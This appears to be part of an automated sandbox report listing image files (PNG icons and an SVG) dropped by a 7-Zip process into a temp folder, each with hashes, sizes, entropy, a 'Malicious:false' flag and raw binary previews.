      SHA-256:4F2FE4B79A404C7B1A85A6C2DB3451445FCD7CA2D0EA2F74B457B6AB95D403F7
      SHA-512:23B9D616F999261D1B179D61F126BE4F15AAB635FE34C189F46523F901762FFDAE48AE7D06F3E5D09A26838F18CC18D1E38E380B18E2947EEF5D1FD9CCA4FF35
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...X...X......f......sRGB.......@.IDATx....#G}..-i4.......zw..5>.6..m..........0WBx.$y.{y$!$y\!/$..a..1...cs....}.k{.{......3.......Fg..Z._.G[...U}K..._..D. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 600 x 600, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):46701
      Entropy (8bit):7.952243342487174
      Encrypted:false
      SSDEEP:
      MD5:CFF6A0AC1ADBD329786C8FE61FC36E50
      SHA1:5F4903E1978C7F6E4419F15303046AC9465591A3
      SHA-256:F0A7F601816A137359EA22D1BB76A806B58BD6D59A560798A5011D8F13D45D5D
      SHA-512:607B12FA94A9E8F78C441D0A28C7AF35C29B644E4597C9AFB85E86715BB2FBC73197BE3C551CD2B1FD59B73A1A1508511924415A42553779EC1805C88551CAE4
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...X...X......f......sRGB.......@.IDATx.....gy...3.....t.V..^....r...b....I....P...bCB...BH.).cb......d.6...-..V=.t.l.y........;3.}..3oy...i....</c( .. .. .. .. .. .. .. .. .. .. .. .. ..MD.7.\1U............1>........as9.=..n!."...L....^.^MW^.....N.y.%.. ..}}`......@..\y...(.r&..I..M..(..bg........q..C9....?!...4..XA."...@..@ ...?....B..i".IP-.sB4...}..#~......u..X.Y.&........"p.%.Y.k...s.t....Y..p..~.....\..ko.........*pp..@..@...\|...|a....Q<."..ZDqR...B..b...t#................=...y...j.k.................&b...N-#/.A$N...E.~..$[...-.?F......../.k4T.G.X...\DL..@..@.6.)..Kc...y...(.Q'.{.v.p. .....~...O.{&...+\.........$ ....1j.A..u.l..."GB....G...?...._"... .. ....X...J.....>".._.^{..i^..P.$...']... .. ...2U../.C..om..A.T.......'..~>.f..6..._A... .. 0.@1...>A^.y3N.C...`...K.__(;....(....?t.. .. ...#p....pE}...%..w.,.1%&........?=...............nQ.o.lE.2..o.-..}...l~.........+...3.......X.zu.=.v?...#?Y/'....;~'..?x.-......
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 28 x 28, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):769
      Entropy (8bit):7.698064929472162
      Encrypted:false
      SSDEEP:
      MD5:AF3AE053803A7FF52BC4EE1E5D50EA09
      SHA1:6BB1CBDB19F27DBDAF79B1C7DE7AA0BCFCABEE0B
      SHA-256:F5A151FD8BC4A5D39BE10610D17C36ABD6DD2DC47413582D97F9157B2EA6B859
      SHA-512:D78E6F8DC6AEF4F823DF6DA9DF86B2E73CA958741BC04578B31214D4556FD8FAEFA78861C7119098DFBAA056F5318416A3C0FDA1F4F9B1D8029D7C8B0E99A87C
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............r......sRGB.........IDATH....o.@.....?...0...*.NAH05..............6(."T$.H.....TE..: ......I........i...........6c.......J...s..&.....>........$.R=.1.a.\....'....w..}v....E........z.y........_.....s...so...p.`..:=....$|..F.N}.EZ0.44..26ZK[.,.y..0r...N<.{..e..R.n..."...~.HJz.j+.....o..1..S...~.yV.x.c3.i2.!g.Dn.J1[9Q..u.....^..~Aa.V.3S#......'...:.k...]...>.=....1.0J.Y/A....8r..?....>#..a.?M......d%.az@."...u.......E..^.r...8.I...px....`!ncy.`G\..C1M@..s\..V..f:|..f.L...>.h.8.}.F.a;\,...\.K.../.N!4...++................0./s.z.Q.,.......s.w.M.._.......M]7. ........P..F.$a.=..(y........`.Qg..{....#.L....WRt.X-9J..uK.C.A.e....V;.M...a..e...jQ3UL%@.h..5.@"ed.zF....[.v.LlC..c.p........Q..b.s.r....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 26 x 26, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):460
      Entropy (8bit):7.272269520120129
      Encrypted:false
      SSDEEP:
      MD5:7847A7F62F2A48212116293EC828C40A
      SHA1:FF84F78C0DB6A058DC4EF6F564662D5A732B58CE
      SHA-256:E8A12449A7CC27DF585C81BCBFD72E304D44DE84D18A888E42D37CF6562DEE91
      SHA-512:556AB257F11AA41574C9B3AB31123D39C18EFC56057F4F929D1A4A3E50B0AF4B4081EB8EB2EBF5159452254EBF1633B781B19E4023DD601D5D71447534EE8568
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............JL.....IDATx.c@.........'00....@..B..............P..L9..i.Pr.E.c.r=.|......?.0<.@...i.+ ...-:....6....^.........].....@^.....pu.....qp.`{.....1.>."\.yy...|....w'%.?..">]@..,..M...O...f....._..J.E......`.........[t...X.(.:....+VPf..7.c..[........Y.........y.....Y...dVV|..."Bx...z..T:.......h.%?..?SX...>.].....[t.....p.}e...o..?........Tk+.3..d.G......|EE.."......%.}F.Op........I.....'..............IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 26 x 26, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):460
      Entropy (8bit):7.357923499861818
      Encrypted:false
      SSDEEP:
      MD5:02840EEEBC3E8CAA2293B59370CC262E
      SHA1:A535C9F318383B6F8FFD08264ABDEA16D06EBFB1
      SHA-256:1F94D78F779E43B0026B8DB78AEE6881268CDB9A3E02F0687FF554F70597C752
      SHA-512:E2E0164ED7D02A670B90C1873D83AA9E88400E607F8E04E5446D1005EE271FF79EA4860441B8EA8C86A00E8002A026FD2544936DC5BB459F4FE60DBA47C9CAA8
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............JL.....IDATx.c.......y.............0T.~.>.~..%....r.W................P..$H+..3..0A....8@c..@-...M.RL......?p.6..:s......MY._6...N!..C.d0./....[...\.9s...|...w......[..E\....,......'..9t.l......M#."..)DY...9.E.........-*...X.(.:.....)........WDY4a...,r........<t..k.K..;...._>........d$..(%.>...n.......V.b.....9......@nYG.....8.w.....*!..&.>j]..lQ.=d.GD....bL#Yu....y.0. .3.}..]..M...M. . }`...............IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 26 x 26, 8-bit colormap, non-interlaced
      Category:dropped
      Size (bytes):470
      Entropy (8bit):7.226515768474719
      Encrypted:false
      SSDEEP:
      MD5:F9583D3F098902D37FE59F8FA5BE1603
      SHA1:08CFFB971A8513C78CB06016C7F1FA88B711AF22
      SHA-256:00F5BAACFBBD9DDF8BF23DAD0F3CFA354DF1C7ADB631E6843CA868DF40C8FBFF
      SHA-512:664B8EC9836BB976BF7E0EA01B554764D46539550C0925FBE8BC28616261B822E82ADC0D14B237E40F60FE967DF3D0A7D7C718082868B39DE158F56CA691C104
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.....................PLTE....p..p..q..q..p..p..q..p..p..p..q.....q........C....B....p......$..&...x......H..F..!........x..............J............s.Q..^......{.z..v........v.......r....e..%...y.VH......tRNS..0.....p..........IDATx^....0..Q..4'..^..^...F..B....A...i'q\.I5pm............0Di.%@.L........p.qnZ..........;C._...[d..u.<....+.....c:k..@.1]^y.Mrs..E...q.#.L........>!>.;TL/..&o^3...^............pZ.......W!O.ce.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 26 x 26, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):459
      Entropy (8bit):7.394277282057856
      Encrypted:false
      SSDEEP:
      MD5:F48DEDAC073679BA4F0B5F8C7BFB6BBE
      SHA1:597E6E24ACFDF434B3DA6D5EEE15CD5B880701C7
      SHA-256:246813A1CD63B301A925BA13C5490A06FE5119620C3B48F5BDC213B81C7DDDA4
      SHA-512:1F5DA99F9E702381C4403876F2101D908ABC9B0AF09DCB09697BBD8E22C29BA03349E1C7C6E5DE7106CFE4298721D2622259A5C3B7318E155F9F72E2FFAD7371
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............JL.....IDATx.b@...S....o.A.....Q..u..m.Qm.m....={..r.._..z...z.E.Z.......$..<...L.@...)N...r.j..\..W.?.$....k_,.v.).....b!...@t.xI......I .;....w.k......=.......f.t..j...A....AT.....E..@.b-s..f.v.5....'.P...5....-^l._;.G.2...2o.c.....Z..;........-..}G.G3x.....>...,T.Ae.-P.T.b&..F...r@rf..M..9`f...vX...._?.@..V.B.g5...9..`.d.B.F7..,...<x.'*...7....G.S........3T.O+......y.:..^..q.$.i....8b.q........IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 26 x 26, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):464
      Entropy (8bit):7.397185568001658
      Encrypted:false
      SSDEEP:
      MD5:A27EA8F05170BA1E11DB7F069D2A3AEB
      SHA1:CC1DF3CDD403B6DC8AAE42CB933E975378DACA3B
      SHA-256:5AA3EC3983ECD22B7E270FA3DB54EC0DE0B68EADE571990B07882E774DD585D3
      SHA-512:860BEB0BE702B9431FD4FE58243BF296BA4D4EFCAE3CD49218C10D0BC40229E6A76EB8D71D1FD6E772B240F34B9BCEEC55A7BA6D149E644D39C100EF03143AF1
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............JL.....IDATx..3..Q..'l.D}..M..6...m.m.m.w......u9..[.1#..G....0'.$1'..q>A.._.......p./"T,y..2.a. .I...J...!'?Y..WF*....."%g.Z....!D........R".i..%.Eo.1...4@@Tn%..' .$.....,.:........<.#m7...E^.5]`...`.........F.x.-.(....T.t.]ug....-.....@..[?Y.H...;4F.W=Qxv9^..3...D..#."..D...MD/....s...dW.2L..7u...$0..jZ.....9.v.<.0..n..p..|.....t....*8..Z.Z.^..{.~?....6.>...^..8...I....r^.Mq...#.....1..........IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 26 x 26, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):470
      Entropy (8bit):7.434554220640192
      Encrypted:false
      SSDEEP:
      MD5:93B0C5ED9CEB0A44B9BF2EAA9EAFA150
      SHA1:AA8F505B5F28CCCCC3D7F7F70C42FCA26E412E01
      SHA-256:9D9F3FF4282C9098533B76F5FBF2E95D4C06C08E2A075833A4CE6E770CB6595B
      SHA-512:7D08F09E8060966E5B26814C16CE1E31BB68055F9A06B59B6FFE15E5734F3BD451EF7B23BD495850CD4B9EB75C02ED96E9A832E439F53E01662274EA6175EA69
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............JL.....IDATx...leQ.....*v..6N...f.6.m.Q..j.ms...3.[..Dgf.....Ut..W.....c_E..../0........W.W,.ip@S:.M.Bl...'.wB..lu.DH....p..7O.fH.B......z...o..*(.n.P.c...._...@...J..1....nr.'A..~..2.cB.h+.t....5`/m..UL...)..n....*.......iP.yt.^DW.......}...V].V....hl~.....q...Z...u.#[I.......v..9... .......T...y.6......[|e}.....@........U...f.*..E.8...ap9.]G...o..=...=.......h!.1......lq..>........ ..j>..?Ux+....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 600 x 600, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):32375
      Entropy (8bit):7.870632631315688
      Encrypted:false
      SSDEEP:
      MD5:E4E5379CDF7128B8B878A4224496281E
      SHA1:A35C9D2EE23A0C67098879AC45A1627968DEFD43
      SHA-256:3940B7F7CB8D87A6ECB06B898D77A4E24D52A0B1157E732A509BA1D9B567B628
      SHA-512:16F261790DB34BF65AD6E95C85D3BD6E670F246B7213CE5B8D7377A4DEEB86286E0D8A122AEF9B48F0754C852E20BE263137C7F27E6481F09A6DBB0AADB6CC69
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...X...X......f......sRGB.......@.IDATx....U.y...0.."...@....[R.......M.t.6.^......4...m.z.V.m..L.../.. .K.Aj"11.Q...yg....`..s.o....9g...k...w..s.^{=..]g.....^O..A...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@...... ...@ s...EL..H!.;...)}....A..|.....$.9mp.[..58~..)..0___.WWWwl..;..........N)...@........"\..._.n...WHL....R.gC....3.k.1?.2b..o..m..*.1.@...(N..U..g .-.e....A>..0.~(P.U...+....g+7f..F7...k.-........J.(...t5....l...z...J......-A..J/.F....yd.E.?n=\..\...@ ...2.3!C ..n...?*q...qe......FG.......s......... ....I..5$
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 600 x 600, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):49503
      Entropy (8bit):7.9584200089575745
      Encrypted:false
      SSDEEP:
      MD5:2058153C6B6ED32BB5678804122059EB
      SHA1:8BC99C74EB1218C0AA376359F293FC07B3DEE1A4
      SHA-256:D465056C95C5A73A911C3D2500C8BBF0F371B0674CC0EA0AFE30F76353709010
      SHA-512:2CC261F1FF33564E15071BDD3B34796706BF46F7194A1EBB1C8A5AC7A38D8BFAA68CF7341B2AB9D29E1C2299838DE347967D0078B6500A1E757A3E34EC2D9DA6
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...X...X......f......sRGB.......@.IDATx....T.....{..*U..T@...X(...H..{....$..(....I.n......5......1..%6D........7.......7.a..=3s.w.w.93G... .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..(?.V..L.K..7..;(R...eY.m1.D.R.........T..)...o.....&.....@&.t.2..;O.....##...........H.L...M.k.........e.6.$..(2.:XE..r....#..".<i.w....N.....=.H....._...I........
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 600 x 600, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):27890
      Entropy (8bit):7.808239532599281
      Encrypted:false
      SSDEEP:
      MD5:3CA51E9AD5984D79FEE5B8DE6BB1DAE5
      SHA1:E990925D6CFD5EA28D1CA44B2FC73F2BBD96C6D1
      SHA-256:3D852D741DA4A673A8861B444B9489218D7865C67BD320B40EA097B0D4312E46
      SHA-512:BEEE5CE29DC3C0983BC7E845816249AD4972649144462520B11727E21171F46F9429A1A14A1FE8B9005BDB3709B1AC9D2CF25374717B9507167FEB28EA3643DF
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...X...X......f......sRGB.......@.IDATx......e.....{...$!.....Pp.."./....u...w.$....{...............*......$!...IH..N.....I:L...twUu.S.-l..z.....SO=..... .... .... .... .... .... .... .... .... .... .... .... .... ....DS..f..... .M..?.V.US:S3.I.MI....?.]ee....{x_4e........e..Ki.@....\x.....o.,.m.r.H..\5MYj.RV...I..r..%${.u..;;.?...#^..\...(@.5.-. .@.........k_*A..].....d.L!....t.=.........K..D[.B....H..@..R....5..5...z.r?`).....>.e..g.......w....#.Y....6-.C..0.\p.F.*.ae..r.G^.0..`Y\.....o]{...y.]..a#.... .*..F..@...s/.az".......J..jeS.K...W.^'.XA.Ve...\..,s..#.@..N.T....I.@....",]W9r.#..........S8.....`..8...%0....k[.>I.JPyT;]...$w$~.{O.}\>.vk........*......h..?.....rw.V.J....Uw.{...W..;... ..W{P...0X.....(..?op....Lv.....L.P6!'FL..+b.Ju.@.:..\.)..m..=..........W.~xO8JE).....Vu....."$ c.Ze..].......N.4u..f........'#`......G..@ ...\~.9I.^#.W.p.(<.......#<..$.TF...2......8....H......R-...S.o...._.%A.A....2RD..@ .....3..\
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 24 x 16, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):798
      Entropy (8bit):6.616741532672906
      Encrypted:false
      SSDEEP:
      MD5:D354769D781B1A6259C7E237AA6D1728
      SHA1:6CF9FC66619F222616D94ECDE182A5AF80F5E4C5
      SHA-256:19FC30BC47A2ECA85E0F6AFC8314937F7B96C58F7325A9400079BC634F3521A5
      SHA-512:35E6C7A4CDAF66E58CC5C3DFF5AC03FFDC347828269472A29CD5C1709E73860700554F26791EE6EA58209B0DF53CF9FF5BBBCDDC4A827CE1C8FF394047D728F4
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............$......sRGB.........iTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.4.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <xmp:CreatorTool>Adobe ImageReady</xmp:CreatorTool>. <tiff:Orientation>1</tiff:Orientation>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>.)..=....IDAT8.....@.D..g[..J...@..n......;..-..lA.....`\p...$.fw....w.BUU[.'..\.2^K.b.....^......B/...Y..O.m..,. ..29.a.`.-....(..kc.L..#U..'.y..Wx.43%..u.D'9.m...L..<.1...G..n.5....gj..V!k.ecI....;(0.".z....&F../.x...6...h6......2.i..<_.....IL.._.;.{.......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 24 x 16, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):294
      Entropy (8bit):6.657132354739158
      Encrypted:false
      SSDEEP:
      MD5:F4AE64B9BF5EB7F06CB2868C47F09047
      SHA1:13D8E2B4E2C132AFE7F98EA94E6DFA3044E9BADF
      SHA-256:FE4954CEB45A28A6711D12BE9508DE5CAFF45BB8FBC6323265B09B6175EC816C
      SHA-512:53900BBE959AE9A11889FCECDAE28E99C8A48AF086DBC538E4403A633578D9F6409D1987B0D064D10938A1D971B54712F083FCFD6E073DC106E69A4D3879F1AD
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............$......tEXtSoftware.Adobe ImageReadyq.e<....IDATx.bb.1`...d.f...........K.......b<....@...F....). NLOO_@... 5.....:....@|...h......._..a ..P..@.>...t..4y. ...U... ).A5....j!....,....F""..j..d....j......D........P%.ASR#4e.p#..E..f.~...h^.....,.K._......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 46 x 38, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1231
      Entropy (8bit):7.797472699893822
      Encrypted:false
      SSDEEP:
      MD5:41FF033EBCA44672B28EA0494C6AED33
      SHA1:E458C60E66139585B5474F995A06CE143D625811
      SHA-256:7E303741F547BC09602392A028E8A5F6A677A7CB9C54ACEAE8DA64E5ADBB02B7
      SHA-512:61C7777A6A532405CAB1F4CB9E9CBEBD0D3F26447331FE2E9DCFDE5D724D9149EFF80066529553F69EDCD7441148935730EBE560F75BB1CA1FC73AD88ECF1430
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.......&.......Z....sRGB.........IDATX..[.MQ..g..qg....0.E).~k....fJ.L.J.. E..A.H^.\J1.......0.3c.F.......i.}.^.19.........o...Z.>ii)....=...f... ..#....GG.!........3....'bO..g=w#.!0.r`.|..;e.GE... ..0..&==...Ud...k..K.z.@.a-.....u..QNy..B.(#b_...>mZ.8..;qZ..p.fC6..G.......G..}. .k.y...;.......$..^...\.OX?l......G...68u...?.~yAe....,h.....l..3l..:../0.5.z..O.`.|..QG..AH&.Qh'j.......;}..|..l.....g@..p..3.....=..n.....a..7.2`,.@g...h.k./v..l.C..:P..:....@..+?R&.W(d?..A...d...BYXGlN.^4...a:...D\4..`.$.9..A=D^.I....8.....y....Kx.:...nBi.~P..(.5..T...;6....cw.6%...r.O....L....-e2Q..*..2v.\o{m.._.r......H#...@mo`0..+J...5.j...|2"xL}2\..<r...^..Q>..('.X..k....Fp.."(.....4t#.a7L.op.l.$m.[..n*h/........4._>S...E/.1.2...5.....)_w..;.0.q..N.k{.F._..q....J...]..(..........:.....}C.q:.tz.D...w$..Fx.._E.....69..c...(O.....=.... ..h..1..+....r.'........:.M...q)...J.2d$.N...a.X?....2...p..,.$.9..k`.s.w.o...N9.`.TW{...*.m.1_..S.oV./..t..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 46 x 38, 8-bit gray+alpha, non-interlaced
      Category:dropped
      Size (bytes):352
      Entropy (8bit):7.218920557463293
      Encrypted:false
      SSDEEP:
      MD5:E4AF1685A7AC0E908A2C8A566358628F
      SHA1:1D267E5D81420455009BCCF7D02CBFACCAB4FEEF
      SHA-256:BD93599C841A8DB6F5E909C4683731E4A3852B613F87A0ECE201DDCD9F205116
      SHA-512:3AC6BDD1F09A9A7732EAFF0896FB0E36EB963EA64AED4A3BBB08E24339C1C8E715AA7153A05C7251BAD6B907EC53649C53BADE554435F060D998AB04B6F97A93
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.......&.......a....'IDATx...Q..!..q$..$ .....J..IX....*....M.d3dr...{.<.B.(....dI.J.?..Vx..x..xa..|...3.F.$f2..v/n.A....|.....E......$T>..~..)...>....7....4?....B......ph....>mu....i....wx].......?8...=../.XfS..X..i...w...k.4..E....dv..._;..%.4...9..P..&c...H..;........b..2.&..q...`lp:.G.K.}C..G1.p.....1..{9k....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 31 x 31, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):574
      Entropy (8bit):7.404562381346236
      Encrypted:false
      SSDEEP:
      MD5:A8B0DF939280533C497F4C6AF7AC39E3
      SHA1:1D076B4EC807DF27617A0D19D545BCA1F741594D
      SHA-256:257FB2C5D33887DBB01131CFAAA9C2017A9C7B7DE09850A40BC8736560E5E7DC
      SHA-512:72C9EB837EB9EA0DA6AF3050C97649BA63C6FFE865A806DA7E9212C61E4BFA3D4D7922CDE96418DD46A94ADE1A3F1445034AA7D21FBF1C88A2997653C52980C3
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR................9....pHYs...%...%.IR$.....IDATH.W-..0...T .H$.YYY.<y?.dee%..D"##......e.$..7....}.o9.^/$J..3..0..tF.\....9..`.=.hy...}...!..p.U .<.p.P....).../.d.y...*i...K]?..).za....< $...q....M.+.C..ck.7.........AK%+..a.\....#...W.d.S......=z..0.Vf......#(....a.......l.._...*..gI..d......'?.[n/...!y..$F.2.V...q......z..[.F:.]K.H...I.G*;.*g..hb.n..Y.W.^....lw/^.H...z."G0.X.n.y@..........J.z.>'7.Q.....zH.j.Z.....?..J..E ..*3..#..H.=e..Z..W_..TCEOL......M.U..V.^.n..n..~48..C.....]J.w.X .8.t.gJ;.....y y...?D~....Go.......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 31 x 31, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):352
      Entropy (8bit):6.94639831826086
      Encrypted:false
      SSDEEP:
      MD5:0E7E4C8A686C37551F78635C49FC71F3
      SHA1:5D74470C30A75DA98F645A08A5EE4892BE43F57C
      SHA-256:B139CE821187A2603BD889FBAC633F7C1675EDBB9B6B6710182215595102BA7E
      SHA-512:EC95C7731A50D5CACCF37542C3BE18ED0810852D9CEB95310CCC266F5F1DEC2BC31F453507DB023A443FA3DBAF4B9B278934EB894DA92292303AF819A9029C3B
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR................9....pHYs...%...%.IR$.....IDATH..-..0...].....Abj ..... .-A......a&.A....p..{.....(....?....a.....|.G..9...al...,..ok..J...5......NV.5......[....m.......T ..z...pR..p....& ...5& ..@..,e......D.....@..L.=.[e}.E..?..x..SI..2..$$mdj..,"S*@Z.F.,..+@V`..Y...d....'..........1....F...j..V.f=.....L.%.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):2109
      Entropy (8bit):7.715786886930873
      Encrypted:false
      SSDEEP:
      MD5:759EB52EBABA2BB763D68CFBEEA241E5
      SHA1:43CF4EDE1F55B5FACCBC6EDD1B91DC51DE4A6594
      SHA-256:E781F51B0888E37B87BA4AF8C9998A75C888ADE0547A2CC2C1296F60B064CE1F
      SHA-512:6F464FDD0741310D7DFA845303E8267ECD56EBC10C4B3BEA80027986D38A7F3177E82AFA62A544A1DE0D43ED131919924496EDC016143C41AF1E13D672A59E9F
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...$...$.............sRGB........ cHRM..z&..............u0...`..:....p..Q<....pHYs................YiTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.4.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <tiff:Orientation>1</tiff:Orientation>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>.L.'Y...QIDATX..WIo.E.....t...1Y.`......!."qH..". .)\..@XH.29 D......@.'..$$+Ba.@$...,..a.8...tW..UO..../.]S.|.....[.jQ"u...\2"............N`5r.$T...\...L.#6..x.r....&\...ly......*..*..9.......bH.......x~y..F.._l......[S..gN.{.<\..f[.g.X,&c.8.c...e.......oE~..z.A...OB....|.V.....H........Z...&Qf....Y./.....94.j..A..B:.Q....Z.}..#.XPnK+.........C.}_Z.D"...I!C...Y....`T..|v@..!Y\j.Y.H.r.)......5...F..G2i.:?u....}..G./<..H....>q..^.rL[A...t.F.....U...!....s.......|M!.b..).U..K..B.6TP2..q...i.>...7.K%m....<&....
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 17 x 11, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):305
      Entropy (8bit):6.901294674064686
      Encrypted:false
      SSDEEP:
      MD5:095F63995DBEFB8BE040222A01921163
      SHA1:28B1463BDA47A4EA88B6EE0B9683099460E1D2B9
      SHA-256:87B8A3C168D80D0CB2AC768CD17D47AAD1C1803DE6E10FC801F18E0C7C80F2D0
      SHA-512:BE94D34F553DA404E0D043E975E2EC3056273917180665F3D5DDFE2BC7266356E88EA2933A4FBF26979ADD89638B2A504A08E2C612D64388FFC5498AC8143309
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............. f.....pHYs...........~.....IDAT(..Qq.@.D......:.`.1.0h ..!..!....apA..Ye.k3.....j%...?g.*..EHj.H.H.........L..m..(......H.....$.I.f\o.5T.AT.R...%..p.r..\.X.......>.K3....L..8R.8v...=n..[..q.....,-.Y.lF.d6A.."..Y.......6/..~v.3.DR.fc{.aJ..[.......Z0P(....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:SVG Scalable Vector Graphics image
      Category:dropped
      Size (bytes):2192
      Entropy (8bit):4.760643160521522
      Encrypted:false
      SSDEEP:
      MD5:CB70EE18330377FF9E3E932015EFCCD2
      SHA1:4FD024F2AB04BF86E72C20D1F53B21F278483326
      SHA-256:DFF0468477E518C4406E186463CEE890C79F55DD047D7A3EA436F3BA2D160C80
